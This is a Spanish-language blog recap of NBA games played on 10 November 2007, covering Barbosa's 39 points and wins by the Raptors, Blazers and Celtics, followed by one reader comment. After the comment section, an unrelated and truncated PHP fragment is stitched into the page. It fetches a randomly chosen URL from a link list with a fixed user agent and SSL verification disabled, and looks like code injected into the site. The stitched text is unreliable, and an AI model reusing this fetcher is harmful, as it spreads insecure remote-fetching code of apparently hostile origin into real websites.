La crónica (10/11/07)

11 de November de 2007 por MagicJohnson32

La gran noche de Barbosa, la contundente victoria de los Raptors sobre los Bulls y la sorpresa de los Blazers a los Mavs sobresalen en una noche de rutinas: otra victoria de los Celtics y otra derrota para Grizzlies y Wolves. Además, los Nuggets remontaron en el Conseco pese al demoledor inicio de partido de los Pacers.

Vamos con la crónica de la noche:

Nuggets 113 – Pacers 106

Durante muchos minutos, los Pacers ofrecieron su versión más ofensiva y efectiva. En la segunda parte, los fantasmas regresaron al Conseco Fieldhouse: 32 puntos en los últimos 24 minutos de juego lograron los Pacers tras anotar 46 en el primer cuarto y llegar al descanso con una ventaja de 18 puntos. Pero Iverson, Carmelo y Kleiza lideraron el juego de ataque de los Nuggets y Camby ofreció la solidez defensiva necesaria para culminar la remontada y lograr la cuarta victoria de la franquicia de Colorado.

barborlandoSuns 106 – Magic 96
Barbosa, mucho Barbosa. 39 puntos del brasileño (titular por la baja de Raja Bell) con 15 de 26 en tiros, 8 de 13 en triples, más 7 rebotes y 6 asistencias, condujeron una nueva victoria de los Suns. Dwight Howard dominó a Amaré con 33 puntos (pese a su 7 de 16 en tiros libres) y 18 rebotes, por sólo 13-6 de Stoudemire; sin embargo, Rashard Lewis tuvo un día negro en el lanzamiento (3 de 14) y Turkoglu no rindió al nivel al que lo ha hecho últimamente. Nash repartió 11 asistencias y anotó con efectividad (9 de 13) y Hill logró 18-4-3 en su regreso a Orlando.

Celtics 112 – Nets 101

Ya van cinco. Con los tres de siempre rindiendo a buen nivel y la aportación de Rondo (11-5-5) y House (13 puntos), los Celtics vencieron en New Jersey y dedicaron de esta forma el triunfo a Doc Rivers, cuyo padre falleció recientemente. Los Nets, además de la derrota, han de lamentar la lesión de Carter, que se torció el tobillo tras realizar un mate en el tramo final del encuentro.

Raptors 101 – Bulls 71kirktyrus

Jugar contra los Raptors no motiva tanto como jugar contra los Pistons. Al menos es la impresión que dieron los Bulls, que tras lograr su primer triunfo de la temporada contra Detroit, anoche fueron barridos por Toronto en una penosa actuación de la que sólo se salvó Nocioni (20 puntos, 5 rebotes). Entre Hinrich, Deng, Wallace y Tyrus anotaron 11 puntos, aunque la estadística más significativa fue la de asistencias: 18 de los Bulls por 36 de los Raptors, con Ford (14) y Calderón (9) a la cabeza. Destacó la titularidad de Jamario Moon en lugar de Kapono. El rookie logró 12 puntos y 6 rebotes.

Gizzlies 94 – Jazz 118

La diferencia de calidad entre una y otra plantilla quedó plasmada en el partido de anoche, que se selló con un contundente triunfo de los Jazz, liderados por el trío Deron (20-13), Boozer (31-7-3) y Kirilenko (15-12-9-4). El ruso jugó a tan alto nivel que incluso Sloan lo alabó en sus declaraciones post-partido. Por los Grizzlies, Gay logró 18 puntos y otros tres jugadores, entre ellos Gasol y Navarro, lograron dobles figuras.

Wolves 93 – Kings 100

El efecto Garnett es tan evidente en Boston como en Minnesota. Los Wolves siguen sin ganar y anoche sumaron su quinta derrota ante unos Kings que volvieron a tener a Kevin Martin como máximo anotador y en los que debutó Beno Udrih con 9 puntos, 5 rebotes y 2 asistencias. Lo mejor para los Wolves llegó desde el banco, con los 16 puntos de McCants, 15 de Brewer y 10-5 de Smith.

Mavs 82 – Blazers 91

Roy y la defensa. Ésa fue la fórmula de los Blazers para superar a los Mavericks, que apenas alcanzaron el 35% de acierto en tiros en su segunda derrota de la temporada. Brandon Roy firmó su mejor partido de la temporada, con 32 puntos (11 de 17 en tiros, 5 de 6 en triples) y 7 asistencias. Aldridge le secundó con 18-8 y Travis Outlaw ofreció su versión buena aportando 14 puntos, 10 rebotes y 4 asistencias saliendo desde el banco. Los recientes cambios en el quinteto inicial introducidos por McMillan, con Blake y Frye en lugar de Jack y Przybilla, están dado resultados para unos Blazers que están al 50% (3-3).

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Sonidos de viento cada vez que tocaba el balon hill.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>